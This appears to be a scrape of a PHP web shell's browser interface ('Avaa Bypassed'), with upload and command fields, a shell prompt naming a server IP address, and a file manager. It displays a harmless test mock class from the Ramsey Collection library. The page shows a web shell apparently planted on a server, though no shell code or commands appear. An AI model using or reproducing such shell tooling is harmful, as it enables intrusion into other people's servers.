404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@3.142.250.109: ~ $
<?php

declare(strict_types=1);

namespace Ramsey\Collection\Test\Tool\Mock;

class ObjectWithToString
{
    public function __toString(): string
    {
        return 'BAZ';
    }
}

Filemanager

Name Type Size Permission Actions
ObjectWithInvoke.php File 166 B 0644
ObjectWithToString.php File 195 B 0644